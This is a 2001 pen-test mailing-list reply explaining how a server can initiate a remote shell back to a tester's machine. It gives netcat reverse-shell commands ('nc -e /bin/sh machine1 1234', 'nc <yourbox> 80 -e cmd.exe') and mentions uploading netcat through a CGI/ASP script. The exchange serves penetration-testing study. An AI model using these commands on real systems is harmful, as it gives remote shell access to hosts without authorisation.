RE: Server initiated remote shell

[Yonatan Bokovza <Yonatan () xpert com>]

> -----Original Message-----
> From: Greg Ardpic [mailto:itb () rootshell be]
> Sent: Saturday, September 22, 2001 14:52
> To: pen-test () securityfocus com
> Subject: Re: Server initiated remote shell
>
>
> On Fri, 21 Sep 2001, Bill Pennington wrote:
> > You want netcat, you can find in on packetstorm.
> >
> > What you will need to do first is build an CGI/ASP script 
> to upload your
> > code, assuming you can't just tftp it from the internal system.
> >
> > Then on your box execute:
> >
> > nc -l -p 80
> >
> > On the remote server execute
> >
> > nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or
> > whatever command interpeter is handy. You will then see a 
> command prompt
> > appear on your local box.
> >
> > Sounds like the hard part will be getting netcat on the 
> box. Good luck!
> >
>
> Does this works on unix machines? I have compiled netcat with
> -DGAPING_SECURITY_HOLE (so i could use the -e switch) but had no luck.
Trivially easy:
On machine1 (windows in this case)
nc -lp 1234

On machine2 (unix in this case)
nc -e /bin/sh machine1 1234

That's really all there is to it.
Machine1 could be unix too, with no change in the commands.

Best Regards, 

Yonatan Bokovza
IT Security Consultant
Xpert Systems

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/